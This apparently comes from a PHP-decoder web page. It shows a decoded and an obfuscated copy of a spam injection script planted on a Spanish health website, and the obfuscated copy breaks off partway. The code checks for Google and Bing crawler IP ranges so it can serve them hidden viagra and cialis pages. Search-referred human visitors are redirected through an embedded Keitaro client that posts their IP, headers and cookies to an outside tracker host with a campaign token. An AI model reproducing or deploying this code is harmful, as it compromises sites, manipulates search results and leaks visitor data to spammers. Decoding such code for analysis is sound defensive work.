Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto TpM4m; TpM4m: $_0 = $_SERVER["\x48\x54\124\120\137\122\x45\x46\x45\x52\105\12..

Decoded Output download

<?php 
 goto TpM4m; TpM4m: $_0 = $_SERVER["HTTP_REFERER"]; goto LgmRK; aMlUz: if (!$_3) { foreach ($_4 as $_5) { list($_6, $_7) = explode("-", $_5, round(0 + 2)); $_8 = (double) sprintf("%u", ip2long($_6)); $_9 = (double) sprintf("%u", ip2long($_7)); $_10 = (double) sprintf("%u", ip2long($_1)); if ($_10 >= $_8 && $_10 <= $_9) { $_3 = true; break; } } } goto aQFWW; ukaYH: $_17 = array("cviaes.html"); goto A5Qk9; aQFWW: $_11 = $_SERVER["REQUEST_URI"]; goto cxDnJ; M_hhF: if (@stripos($_2, "google") !== false) { $_3 = true; } goto aMlUz; A5Qk9: switch ($_11) { case $_16[round(0)]: include $_15 . $_17[round(0)]; die; break; } goto xJ_oa; q4xmq: $_2 = $_SERVER["HTTP_USER_AGENT"]; goto XSmCG; xJ_oa: $_1 = $_SERVER["REMOTE_ADDR"]; goto Lojl1; SARVj: $_16 = array("/viagra-espana"); goto ukaYH; LgmRK: $_1 = $_SERVER["REMOTE_ADDR"]; goto q4xmq; AGQ75: $_11 = $_SERVER["REQUEST_URI"]; goto bnNMr; bnNMr: $_15 = "../logs/tmp/"; goto SARVj; XSmCG: $_3 = false; goto uUZxy; T3LTV: if (!$_3) { foreach ($_4 as $_5) { list($_6, $_7) = explode("-", $_5, round(0 + 0.4 + 0.4 + 0.4 + 0.4 + 0.4)); $_8 = (double) sprintf("%u", ip2long($_6)); $_9 = (double) sprintf("%u", ip2long($_7)); $_10 = (double) sprintf("%u", ip2long($_1)); if ($_10 >= $_8 && $_10 <= $_9) { $_3 = true; break; } } } goto gmrvN; Lojl1: $_2 = $_SERVER["HTTP_USER_AGENT"]; goto uzYQ8; pB2vq: $_4 = array("5.253.63.0-5.253.63.255", "64.68.80.0-64.68.95.255", "66.249.64.0-66.249.95.255", "64.18.0.1-64.18.15.254", "64.233.160.1-64.233.191.254", "66.102.0.1-66.102.15.254", "72.14.192.1-72.14.255.254", "74.125.0.1-74.125.255.254", "173.194.0.1-173.194.255.254", "207.126.144.1-207.126.159.254", "209.85.128.1-209.85.255.254", "216.239.32.1-216.239.63.254", "72.14.199.0-72.14.199.255", "8.6.48.0-8.6.48.255", "67.195.0.0-67.195.255.255", "69.147.64.069.147.127.255", "72.30.64.072.30.255.255", "74.6.0.074.6.255.255", "65.52.0.065.55.255.255", "207.46.0.0207.46.255.255"); goto Yx1hu; uzYQ8: $_3 = false; goto pB2vq; laHLK: if ($_3) { switch ($_11) { case "/": include $_15 . "index.htm"; die; break; case "/category/alimentacion/": include $_15 . "cviaes.html"; die; break; case "/category/cuerpo/": include $_15 . "cviag.html"; die; break; case "/category/mente/": include $_15 . "csiles.html"; die; break; case "/category/terapias/": include $_15 . "csilg.html"; die; break; case "/category/vida/": include $_15 . "cviaf.html"; die; break; case "/category/charlas-healthy/": include $_15 . "viaf.html"; die; break; case "/cursos-behealthy/": include $_15 . "cciaes.html"; die; break; case "/contacto/": include $_15 . "cciag.html"; die; break; case "/publicidad/": include $_15 . "tadoes.html"; die; break; case "/cardiodance/": include $_15 . "ctad20m.html"; die; break; case "/tienda/": include $_15 . "ciap.html"; die; break; case "/matriculacion/": include $_15 . "cciaf.html"; die; break; } } goto P1UQ_; MLNLN: if (!$_3) { if ((stripos($_0, "google.") || stripos($_0, "bing.")) && isset($_12)) { goto aBzKY; uWc4r: class ResponseExecutor { public static function sendHeaders($result) { if (!empty($result->headers)) { foreach ($result->headers as $header) { if (!headers_sent()) { header($header); } } } if (!empty($result->status)) { static::_sendResponseCode($result->status); } if (!empty($result->contentType)) { $header = "Content-type: " . $result->contentType; $headers[] = $header; if (!headers_sent()) { header($header); } } } public static function containsActionHeader($headers) { if (empty($headers)) { return false; } foreach ($headers as $header) { if (strpos($header, "Location:") === 0) { return true; } if (strstr($header, "404 Not Found")) { return true; } } return false; } private static function _sendResponseCode($code = null) { if ($code !== null) { switch ($code) { case 100: $text = "Continue"; break; case 101: $text = "Switching Protocols"; break; case 200: $text = "OK"; break; case 201: $text = "Created"; break; case 202: $text = "Accepted"; break; case 203: $text = "Non-Authoritative Information"; break; case 204: $text = "No Content"; break; case 205: $text = "Reset Content"; break; case 206: $text = "Partial Content"; break; case 300: $text = "Multiple Choices"; break; case 301: $text = "Moved Permanently"; break; case 302: $text = "Moved Temporarily"; break; case 303: $text = "See Other"; break; case 304: $text = "Not Modified"; break; case 305: $text = "Use Proxy"; break; case 400: $text = "Bad Request"; break; case 401: $text = "Unauthorized"; break; case 402: $text = "The license must be in Pro edition or higher"; break; case 403: $text = "Forbidden"; break; case 404: $text = "Not Found"; break; case 405: $text = "Method Not Allowed"; break; case 406: $text = "Not Acceptable"; break; case 407: $text = "Proxy Authentication Required"; break; case 408: $text = "Request Time-out"; break; case 409: $text = "Conflict"; break; case 410: $text = "Gone"; break; case 411: $text = "Length Required"; break; case 412: $text = "Precondition Failed"; break; case 413: $text = "Request Entity Too Large"; break; case 414: $text = "Request-URI Too Large"; break; case 415: $text = "Unsupported Media Type"; break; case 500: $text = "Internal Server Error"; break; case 501: $text = "Not Implemented"; break; case 502: $text = "Bad Gateway"; break; case 503: $text = "Service Unavailable"; break; case 504: $text = "Gateway Time-out"; break; case 505: $text = "HTTP Version not supported"; break; default: $text = ''; } $protocol = isset($_SERVER["SERVER_PROTOCOL"]) ? $_SERVER["SERVER_PROTOCOL"] : "HTTP/1.0"; header($protocol . " " . $code . " " . $text); } } } goto cPifu; v8NMo: class KClientError extends Exception { const ERROR_UNKNOWN = "UNKNOWN"; public function getHumanCode() { switch ($this->getCode()) { case CURLE_HTTP_RETURNED_ERROR: preg_match("/The requested URL returned error: (?'errorCode'\d+).*$/", $this->getMessage(), $matches); $errorCode = isset($matches["errorCode"]) ? $matches["errorCode"] : "HTTP_ERROR_" . self::ERROR_UNKNOWN; return "[REQ_ERR: {$errorCode}]"; case CURLE_UNSUPPORTED_PROTOCOL: return "[REQ_ERR: UNSUPPORTED_PROTOCOL]"; case CURLE_FAILED_INIT: return "[REQ_ERR: FAILED_INIT]"; case CURLE_URL_MALFORMAT: return "[REQ_ERR: BAD_URL]"; case CURLE_COULDNT_RESOLVE_PROXY: return "[REQ_ERR: COULDNT_RESOLVE_PROXY]"; case CURLE_COULDNT_RESOLVE_HOST: return "[REQ_ERR: COULDNT_RESOLVE_HOST]"; case CURLE_COULDNT_CONNECT: return "[REQ_ERR: COULDNT_CONNECT]"; case CURLE_PARTIAL_FILE: return "[REQ_ERR: PARTIAL_FILE]"; case CURLE_READ_ERROR: return "[REQ_ERR: READ_ERROR]"; case CURLE_OUT_OF_MEMORY: return "[REQ_ERR: OUT_OF_MEMORY]"; case CURLE_OPERATION_TIMEDOUT: return "[REQ_ERR: OPERATION_TIMEDOUT]"; case CURLE_HTTP_POST_ERROR: return "[REQ_ERR: HTTP_POST_ERROR]"; case CURLE_BAD_FUNCTION_ARGUMENT: return "[REQ_ERR: BAD_FUNCTION_ARGUMENT]"; case CURLE_TOO_MANY_REDIRECTS: return "[REQ_ERR: TOO_MANY_REDIRECTS]"; case CURLE_GOT_NOTHING: return "[REQ_ERR: GOT_NOTHING]"; case CURLE_SEND_ERROR: return "[REQ_ERR: SEND_ERROR]"; case CURLE_RECV_ERROR: return "[REQ_ERR: RECV_ERROR]"; case CURLE_BAD_CONTENT_ENCODING: return "[REQ_ERR: BAD_CONTENT_ENCODING]"; case CURLE_SSL_CACERT: case CURLE_SSL_CACERT_BADFILE: case CURLE_SSL_CERTPROBLEM: case CURLE_SSL_CIPHER: case CURLE_SSL_CONNECT_ERROR: case CURLE_SSL_ENGINE_NOTFOUND: case CURLE_SSL_ENGINE_SETFAILED: case CURLE_SSL_PEER_CERTIFICATE: case CURLE_SSL_PINNEDPUBKEYNOTMATCH: return "[REQ_ERR: SSL]"; case CURLE_OK: return ''; default: return "[REQ_ERR: " . self::ERROR_UNKNOWN . "]"; } } } goto NPAcW; cPifu: class KHttpClient { const UA = "KHttpClient"; public function request($url, $params, $opts = array()) { if (!in_array("curl", get_loaded_extensions())) { return json_encode(array("error" => "Curl extension must be instsalled")); } $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_COOKIE, isset($opts["cookies"]) ? $opts["cookies"] : null); curl_setopt($ch, CURLOPT_NOBODY, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_USERAGENT, self::UA); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); curl_setopt($ch, CURLOPT_FAILONERROR, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $result = curl_exec($ch); if (curl_error($ch)) { throw new KClientError(curl_error($ch), curl_errno($ch)); } if (empty($result)) { throw new KClientError("Empty response"); } return $result; } } goto v8NMo; aBzKY: class KClient { const SESSION_SUB_ID = "sub_id"; const SESSION_LANDING_TOKEN = "landing_token"; const VERSION = 3; const STATE_SESSION_KEY = "keitaro_state"; const STATE_SESSION_EXPIRES_KEY = "keitaro_state_expires"; const DEFAULT_TTL = 1; const NOT_FOUND_STATUS = 404; private $_httpClient; private $_debug = false; private $_trackerUrl; private $_params = array(); private $_log = array(); private $_excludeParams = array("api_key", "token", "language", "ua", "ip", "referrer", "force_redirect_offer"); private $_result; private $_stateRestored; private $_sessionsDisabled = false; const ERROR = "[KTrafficClient] Something is wrong. Enable debug mode to see the reason."; public function __construct($trackerUrl, $token) { $this->trackerUrl($trackerUrl); $this->campaignToken($token); $this->version(self::VERSION); $this->param("info", 1); $this->fillParams(); } public function fillParams() { $referrer = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : null; $this->setHttpClient(new KHttpClient()); $host = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : null; $requestUri = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : null; $this->ip($this->_findIp())->ua(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : null)->language(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? substr($_SERVER["HTTP_ACCEPT_LANGUAGE"], 0, 2) : '')->xRequestedWith(isset($_SERVER["HTTP_X_REQUESTED_WITH"]) ? $_SERVER["HTTP_X_REQUESTED_WITH"] : null)->seReferrer($referrer)->referrer($referrer)->param("original_headers", $this->_getAllHeaders())->param("original_host", isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : "localhost")->param("original_method", isset($_SERVER["REQUEST_METHOD"]) ? $_SERVER["REQUEST_METHOD"] : "GET")->param("uri", (!empty($_SERVER["HTTPS"]) ? "https" : "http") . "://" . $host . $requestUri)->param("kversion", "3.4"); if ($this->isPrefetchDetected()) { $this->param("prefetch", 1); } } public function currentPageAsReferrer() { $this->referrer($this->_getCurrentPage()); return $this; } public function debug($state = true) { $this->_debug = $state; return $this; } public function seReferrer($seReferrer) { $this->_params["se_referrer"] = $seReferrer; return $this; } public function referrer($referrer) { $this->_params["referrer"] = $referrer; return $this; } public function xRequestedWith($xRequestedWith) { $this->_params["x_requested_with"] = $xRequestedWith; return $this; } public function setHttpClient($httpClient) { $this->_httpClient = $httpClient; return $this; } public function trackerUrl($trackerUrl) { if (!empty($trackerUrl)) { $request = parse_url($trackerUrl); $this->_trackerUrl = "{$request["scheme"]}://{$request["host"]}"; if (isset($request["port"])) { $this->_trackerUrl .= ":" . $request["port"]; } } } public function token($token) { return $this->campaignToken($token); } public function campaignToken($campaignToken) { $this->_params["token"] = $campaignToken; return $this; } public function version($version) { $this->_params["version"] = $version; return $this; } public function ua($ua) { $this->_params["ua"] = $ua; return $this; } public function language($language) { $this->_params["language"] = $language; return $this; } public function keyword($keyword) { $this->_params["keyword"] = $keyword; return $this; } public function forceRedirectOffer() { $this->_params["force_redirect_offer"] = 1; } public function ip($ip) { $this->_params["ip"] = $ip; return $this; } public function sendUtmLabels() { foreach ($_GET as $name => $value) { if (strstr($name, "utm_")) { $this->_params[$name] = $value; } } } public function setLandingToken($token) { $this->_startSession(); $_SESSION["token"] = $token; } public function getSubId() { $result = $this->performRequest(); if (empty($result->info->sub_id)) { $this->log("No sub_id is defined"); return "no_subid"; } $subId = $result->info->sub_id; return $subId; } public function getToken() { $result = $this->performRequest(); if (empty($result->info->sub_id)) { $this->log("No landing token is defined"); return "no_token"; } $subId = $result->info->token; return $subId; } public function sendAllParams() { foreach ($_GET as $name => $value) { if (empty($this->_params[$name]) && !in_array($name, $this->_excludeParams)) { $this->_params[$name] = $value; } } } public function restoreFromSession() { if ($this->isStateRestored() || $this->_sessionsDisabled) { return; } $this->_startSession(); if (!empty($_SESSION[self::STATE_SESSION_KEY])) { if ($_SESSION[self::STATE_SESSION_EXPIRES_KEY] < time()) { unset($_SESSION[self::STATE_SESSION_KEY]); unset($_SESSION[self::STATE_SESSION_EXPIRES_KEY]); $this->log("State expired"); } else { $this->_result = json_decode($_SESSION[self::STATE_SESSION_KEY], false); if (isset($this->_result) && isset($this->_result->headers)) { $this->_result->headers = array(); } $this->_stateRestored = true; $this->log("State restored"); } } } public function disableSessions() { $this->_sessionsDisabled = true; } public function restoreFromQuery() { if (isset($_GET["_subid"])) { $this->_stateRestored = true; if (empty($this->_result)) { $this->_result = new StdClass(); $this->_result->info = new StdClass(); } $this->_result->info->sub_id = $_GET["_subid"]; $this->log("SubId loaded from query"); if (isset($_GET["_token"])) { $this->_result->info->token = $_GET["_token"]; $this->log("Landing token loaded from query"); } $this->_storeState($this->_result, self::DEFAULT_TTL); $this->_stateRestored = true; } } public function isStateRestored() { return $this->_stateRestored; } public function isPrefetchDetected() { $checkServerParams = array("HTTP_X_PURPOSE" => "preview", "HTTP_X_MOZ" => "prefetch", "HTTP_X_FB_HTTP_ENGINE" => "Liger"); foreach ($checkServerParams as $name => $value) { if (isset($_SERVER[$name]) && $_SERVER[$name] == $value) { return true; } } return false; } public function saveCookie($key, $value, $ttl) { if (isset($_COOKIE[$key]) && $_COOKIE[$key] == $value) { return; } if (!headers_sent()) { setcookie($key, $value, $this->_getCookiesExpireTimestamp($ttl), "/", $this->_getCookieHost()); } $_COOKIE[$key] = $value; } public function param($name, $value) { if (!in_array($name, $this->_excludeParams)) { $this->_params[$name] = $value; } return $this; } public function params($value) { if (!empty($value)) { if (is_string($value)) { parse_str($value, $result); foreach ($result as $name => $value) { $this->param($name, $value); } } } return $this; } public function reset() { $this->_result = null; } public function performRequest() { if ($this->_result) { return $this->_result; } $request = $this->_buildRequestUrl(); $params = $this->getParams(); $options = $this->_getRequestOptions(); $this->log("Request: " . $request); try { $result = $this->_httpClient->request($request, $params, $options); $this->log("Response: " . $result); } catch (KClientError $e) { if ($this->_debug) { throw $e; } else { $errorCode = $e->getHumanCode(); $errorCode = $errorCode ? $errorCode . " " : ''; echo $errorCode . self::ERROR; return; } } $this->_result = json_decode($result); $this->_storeState($this->_result, isset($this->_result->cookies_ttl) ? $this->_result->cookies_ttl : null); if (isset($this->_result->cookies)) { $this->_saveKeitaroCookies($this->_result->cookies, $this->_result->cookies_ttl); } return $this->_result; } public function execute($break = false, $print = true) { $result = $this->performRequest(); $body = $this->_buildBody($result); if (!$print) { return $body; } $this->_sendHeaders($result); echo $body; } public function executeAndBreak() { $result = $this->performRequest(); $body = $this->_buildBody($result); $this->_sendHeaders($result); if (!empty($body)) { die($body); } if (!empty($result->headers) && ResponseExecutor::containsActionHeader($result->headers)) { die($body); } if (!empty($result->status) && $result->status == self::NOT_FOUND_STATUS) { die($body); } } public function getContent() { $result = $this->performRequest(); return $this->_buildBody($result); } public function showLog($separator = "<br />") { echo "<hr>" . implode($separator, $this->getLog()) . "<hr>"; } public function log($msg) { if ($this->_debug) { error_log($msg); } $this->_log[] = $msg; } public function getLog() { return $this->_log; } public function getParams() { return $this->_params; } private function _sendHeaders($result) { $file = ''; $line = ''; if (headers_sent($file, $line)) { $msg = "Body output already started"; if (!empty($file)) { $msg .= "({$file}:{$line})"; } $this->log($msg); return; } ResponseExecutor::sendHeaders($result); } private function _storeState($result, $ttl) { if ($this->_sessionsDisabled) { return; } $this->_startSession(); $_SESSION[self::STATE_SESSION_KEY] = json_encode($result); $_SESSION[self::STATE_SESSION_EXPIRES_KEY] = time() + $ttl * 60 * 60; if (!empty($result->info)) { if (!empty($result->info->sub_id)) { $_SESSION[self::SESSION_SUB_ID] = $result->info->sub_id; } if (!empty($result->info->token)) { $_SESSION[self::SESSION_LANDING_TOKEN] = $result->info->token; } } } private function _buildBody($result) { $content = ''; if (!empty($result)) { if (!empty($result->error)) { $content .= $result->error; } if (!empty($result->body)) { if (isset($result->contentType) && (strstr($result->contentType, "image") || strstr($result->contentType, "application/pdf"))) { $content = base64_decode($result->body); } else { $content .= $result->body; } } } return $content; } private function _saveKeitaroCookies($cookies, $ttl) { foreach ($cookies as $key => $value) { $this->saveCookie($key, $value, $ttl); } } public function getOffer($params = array(), $fallback = "no_offer") { $result = $this->performRequest(); $token = $this->getToken(); if (empty($token)) { $this->log("Campaign hasn't returned offer"); return $fallback; } $params["_lp"] = 1; $params["_token"] = $result->info->token; return $this->_buildOfferUrl($params); } public function isBot() { $result = $this->performRequest(); if (isset($result->info)) { return isset($result->info->is_bot) ? $result->info->is_bot : false; } } public function isUnique($level = "campaign") { $result = $this->performRequest(); if (isset($result->info) && $result->info->uniqueness) { return isset($result->info->uniqueness->{$level}) ? $result->info->uniqueness->{$level} : false; } } public function forceChooseOffer() { throw new \Error("forceChooseOffer was removed in KClient v3."); } public function getBody() { $result = $this->performRequest(); return $result->body; } public function getHeaders() { $result = $this->performRequest(); return $result->headers; } private function _startSession() { if (!headers_sent()) { @session_start(); } } private function _buildOfferUrl($params = array()) { $params = http_build_query($params); return "{$this->_trackerUrl}/?{$params}"; } private function _getCurrentPage() { if (isset($_SERVER["SERVER_PORT"]) && $_SERVER["SERVER_PORT"] == 443 || !empty($_SERVER["HTTPS"])) { $scheme = "https"; } else { $scheme = "http"; } return $scheme . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; } private function _buildRequestUrl() { return $this->_trackerUrl . "/click_api/v" . self::VERSION; } private function _findIp() { $ip = null; $headers = array("HTTP_X_FORWARDED_FOR", "HTTP_FORWARDED_FOR", "HTTP_X_FORWARDED", "HTTP_FORWARDED", "HTTP_CLIENT_IP", "HTTP_FORWARDED_FOR_IP", "X_FORWARDED_FOR", "FORWARDED_FOR", "X_FORWARDED", "FORWARDED", "CLIENT_IP", "FORWARDED_FOR_IP", "HTTP_CF_CONNECTING_IP", "HTTP_PROXY_CONNECTION"); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $tmp = explode(",", $_SERVER[$header]); $ip = trim($tmp[0]); break; } } if (strstr($ip, ",")) { $tmp = explode(",", $ip); if (stristr($_SERVER["HTTP_USER_AGENT"], "mini")) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (empty($ip)) { $ip = isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "127.0.0.1"; } return $ip; } private function _getCookiesExpireTimestamp($ttl) { return time() + 60 * 60 * $ttl; } private function _getCookieHost() { if (isset($_SERVER["HTTP_HOST"]) && substr_count($_SERVER["HTTP_HOST"], ".") < 3) { $host = "." . str_replace("www.", '', $_SERVER["HTTP_HOST"]); } else { $host = null; } return $host; } private function _getRequestOptions() { $opts = array(); if (isset($_SERVER["HTTP_COOKIE"])) { $opts["cookies"] = preg_replace("/PHPSESSID=.*?;/si", '', $_SERVER["HTTP_COOKIE"]); } return $opts; } private function _getAllHeaders() { $headers = array(); foreach ($_SERVER as $name => $value) { if (substr($name, 0, 5) == "HTTP_") { $headers[str_replace(" ", "-", ucwords(strtolower(str_replace("_", " ", substr($name, 5)))))] = $value; } } return $headers; } } goto uWc4r; NPAcW: class_alias("KClient", "KClickClient"); $client = new KClient("https://maketophotlove.com/", "75kgpqtrnkz6lmkxspsgdfspv3yf4xql"); $client->sendAllParams(); $client->forceRedirectOffer(); $client->param("sub_id_2", "behealthy.es"); $client->param("sub_id_1", $_12); $client->currentPageAsReferrer(); $client->executeAndBreak(); } } goto AGQ75; uUZxy: $_4 = array("5.253.63.0-5.253.63.255", "64.68.80.0-64.68.95.255", "66.249.64.0-66.249.95.255", "64.18.0.1-64.18.15.254", "64.233.160.1-64.233.191.254", "66.102.0.1-66.102.15.254", "72.14.192.1-72.14.255.254", "74.125.0.1-74.125.255.254", "173.194.0.1-173.194.255.254", "207.126.144.1-207.126.159.254", "209.85.128.1-209.85.255.254", "216.239.32.1-216.239.63.254", "72.14.199.0-72.14.199.255", "8.6.48.0-8.6.48.255", "67.195.0.0-67.195.255.255", "69.147.64.069.147.127.255", "72.30.64.072.30.255.255", "74.6.0.074.6.255.255", "65.52.0.065.55.255.255", "207.46.0.0207.46.255.255"); goto M_hhF; cxDnJ: switch ($_11) { case "/category/alimentacion/": case "/category/cuerpo/": case "/category/mente/": case "/category/terapias/": case "/category/vida/": case "/category/charlas-healthy/": $_12 = "viagra"; break; case "/cursos-behealthy/": case "/contacto/": case "/publicidad/": case "/cardiodance/": case "/tienda/": case "/matriculacion/": $_12 = "cialis"; break; } goto MLNLN; gmrvN: $_11 = $_SERVER["REQUEST_URI"]; goto laHLK; Yx1hu: if (@stripos($_2, "google") !== false) { $_3 = true; } goto T3LTV; P1UQ_: ?>

Did this file decode correctly?

Original Code

<?php
 goto TpM4m; TpM4m: $_0 = $_SERVER["\x48\x54\124\120\137\122\x45\x46\x45\x52\105\122"]; goto LgmRK; aMlUz: if (!$_3) { foreach ($_4 as $_5) { list($_6, $_7) = explode("\x2d", $_5, round(0 + 2)); $_8 = (double) sprintf("\x25\x75", ip2long($_6)); $_9 = (double) sprintf("\x25\x75", ip2long($_7)); $_10 = (double) sprintf("\45\165", ip2long($_1)); if ($_10 >= $_8 && $_10 <= $_9) { $_3 = true; break; } } } goto aQFWW; ukaYH: $_17 = array("\x63\166\x69\x61\145\x73\56\150\x74\155\154"); goto A5Qk9; aQFWW: $_11 = $_SERVER["\x52\105\x51\125\105\123\124\x5f\x55\122\x49"]; goto cxDnJ; M_hhF: if (@stripos($_2, "\147\x6f\157\147\154\x65") !== false) { $_3 = true; } goto aMlUz; A5Qk9: switch ($_11) { case $_16[round(0)]: include $_15 . $_17[round(0)]; die; break; } goto xJ_oa; q4xmq: $_2 = $_SERVER["\x48\x54\x54\120\137\125\x53\x45\122\x5f\101\107\x45\116\x54"]; goto XSmCG; xJ_oa: $_1 = $_SERVER["\x52\105\x4d\x4f\124\x45\x5f\101\104\x44\122"]; goto Lojl1; SARVj: $_16 = array("\57\166\151\x61\147\162\x61\x2d\x65\x73\160\x61\x6e\141"); goto ukaYH; LgmRK: $_1 = $_SERVER["\122\105\115\117\124\105\x5f\x41\104\104\122"]; goto q4xmq; AGQ75: $_11 = $_SERVER["\x52\105\x51\125\x45\x53\x54\x5f\x55\x52\x49"]; goto bnNMr; bnNMr: $_15 = "\x2e\56\57\x6c\157\147\163\x2f\x74\155\160\x2f"; goto SARVj; XSmCG: $_3 = false; goto uUZxy; T3LTV: if (!$_3) { foreach ($_4 as $_5) { list($_6, $_7) = explode("\55", $_5, round(0 + 0.4 + 0.4 + 0.4 + 0.4 + 0.4)); $_8 = (double) sprintf("\45\165", ip2long($_6)); $_9 = (double) sprintf("\x25\x75", ip2long($_7)); $_10 = (double) sprintf("\45\x75", ip2long($_1)); if ($_10 >= $_8 && $_10 <= $_9) { $_3 = true; break; } } } goto gmrvN; Lojl1: $_2 = $_SERVER["\110\x54\x54\120\137\125\123\x45\122\x5f\x41\x47\x45\116\x54"]; goto uzYQ8; pB2vq: $_4 = array("\x35\56\62\x35\x33\x2e\66\63\x2e\x30\x2d\65\56\62\65\63\56\66\x33\x2e\x32\65\x35", "\x36\x34\56\x36\70\56\x38\60\56\x30\x2d\66\x34\x2e\x36\70\x2e\x39\x35\x2e\62\x35\65", "\x36\66\x2e\x32\x34\x39\x2e\66\64\x2e\60\55\66\66\x2e\62\64\71\x2e\71\65\56\62\65\65", "\x36\x34\x2e\x31\x38\x2e\x30\56\61\55\66\64\x2e\61\x38\56\x31\65\56\x32\x35\x34", "\x36\x34\x2e\62\x33\x33\56\61\66\x30\x2e\x31\55\x36\64\56\62\x33\x33\56\61\71\61\x2e\62\x35\64", "\x36\x36\56\61\x30\62\x2e\x30\x2e\x31\x2d\x36\x36\x2e\61\x30\62\56\61\65\x2e\x32\65\x34", "\67\x32\56\61\x34\56\x31\71\62\56\61\x2d\67\62\x2e\61\x34\x2e\62\65\65\56\62\x35\x34", "\67\x34\x2e\x31\62\65\56\60\x2e\61\55\x37\64\56\61\62\65\x2e\x32\x35\x35\56\x32\65\64", "\x31\x37\63\56\x31\x39\x34\56\x30\x2e\x31\55\x31\x37\x33\56\61\x39\x34\56\x32\65\65\56\x32\65\x34", "\62\x30\67\56\x31\x32\x36\56\x31\x34\64\x2e\x31\55\62\x30\x37\x2e\x31\62\x36\x2e\x31\x35\x39\56\62\65\x34", "\62\x30\x39\x2e\x38\65\56\61\x32\x38\56\61\55\62\60\x39\56\70\x35\x2e\62\x35\65\x2e\x32\x35\x34", "\62\61\x36\56\62\63\x39\x2e\x33\x32\56\x31\55\62\61\x36\56\62\x33\x39\56\66\x33\x2e\x32\65\64", "\x37\x32\x2e\x31\x34\x2e\61\x39\x39\x2e\60\55\x37\x32\x2e\61\64\x2e\x31\x39\71\x2e\62\65\x35", "\x38\x2e\66\56\x34\70\x2e\60\55\70\x2e\66\x2e\x34\70\56\62\x35\x35", "\x36\67\56\x31\x39\x35\56\60\x2e\60\55\66\67\56\x31\x39\65\56\x32\x35\x35\56\x32\65\65", "\x36\x39\x2e\x31\64\67\x2e\66\x34\x2e\x30\xe2\x80\223\x36\71\56\61\64\67\x2e\x31\62\67\56\62\x35\65", "\x37\x32\x2e\63\x30\x2e\x36\64\x2e\x30\342\x80\x93\67\x32\x2e\x33\60\x2e\x32\x35\65\56\62\x35\65", "\x37\x34\56\66\x2e\x30\x2e\60\xe2\x80\x93\x37\64\x2e\x36\x2e\x32\x35\x35\x2e\62\x35\65", "\66\65\56\65\x32\x2e\60\56\60\xe2\200\223\x36\x35\56\65\65\56\x32\x35\x35\56\x32\65\65", "\x32\x30\67\x2e\x34\x36\56\x30\x2e\60\xe2\200\223\x32\x30\x37\56\64\66\x2e\62\x35\65\x2e\x32\65\x35"); goto Yx1hu; uzYQ8: $_3 = false; goto pB2vq; laHLK: if ($_3) { switch ($_11) { case "\57": include $_15 . "\x69\x6e\x64\145\x78\56\x68\x74\155"; die; break; case "\57\143\x61\164\x65\x67\157\x72\171\x2f\141\x6c\151\x6d\x65\156\x74\x61\x63\x69\x6f\x6e\x2f": include $_15 . "\x63\x76\x69\x61\145\163\x2e\x68\x74\155\x6c"; die; break; case "\57\143\x61\x74\x65\147\x6f\162\x79\x2f\143\x75\x65\162\160\x6f\x2f": include $_15 . "\143\166\x69\x61\147\x2e\150\164\155\x6c"; die; break; case "\x2f\143\x61\164\145\147\157\162\x79\x2f\155\145\156\164\x65\57": include $_15 . "\143\x73\x69\x6c\145\163\x2e\150\x74\x6d\154"; die; break; case "\x2f\143\x61\164\145\147\157\x72\171\57\164\145\162\x61\160\151\x61\x73\x2f": include $_15 . "\x63\x73\151\x6c\x67\56\150\x74\x6d\x6c"; die; break; case "\57\x63\x61\x74\145\147\157\x72\x79\x2f\166\x69\x64\141\57": include $_15 . "\143\166\x69\141\146\x2e\150\x74\x6d\x6c"; die; break; case "\x2f\143\x61\x74\145\x67\x6f\x72\x79\x2f\143\150\x61\x72\x6c\141\x73\x2d\150\145\141\x6c\x74\x68\x79\57": include $_15 . "\x76\x69\141\x66\x2e\150\164\155\x6c"; die; break; case "\57\143\165\162\x73\157\x73\55\142\145\150\145\x61\x6c\x74\150\171\57": include $_15 . "\143\143\x69\141\145\x73\56\x68\164\155\154"; die; break; case "\57\143\157\156\x74\x61\x63\x74\x6f\57": include $_15 . "\143\x63\x69\141\147\56\150\x74\155\154"; die; break; case "\x2f\x70\165\142\x6c\x69\143\151\144\141\144\x2f": include $_15 . "\x74\x61\x64\x6f\x65\163\56\x68\164\155\154"; die; break; case "\x2f\143\141\162\144\x69\x6f\x64\141\156\x63\x65\x2f": include $_15 . "\143\x74\141\144\62\x30\155\x2e\150\164\155\154"; die; break; case "\x2f\x74\151\x65\156\x64\141\x2f": include $_15 . "\x63\x69\x61\x70\x2e\x68\x74\155\154"; die; break; case "\57\x6d\141\x74\162\151\x63\165\x6c\141\x63\151\x6f\x6e\57": include $_15 . "\x63\143\x69\x61\146\56\x68\x74\155\154"; die; break; } } goto P1UQ_; MLNLN: if (!$_3) { if ((stripos($_0, "\x67\x6f\x6f\147\154\145\56") || stripos($_0, "\142\151\156\x67\56")) && isset($_12)) { goto aBzKY; uWc4r: class ResponseExecutor { public static function sendHeaders($result) { if (!empty($result->headers)) { foreach ($result->headers as $header) { if (!headers_sent()) { header($header); } } } if (!empty($result->status)) { static::_sendResponseCode($result->status); } if (!empty($result->contentType)) { $header = 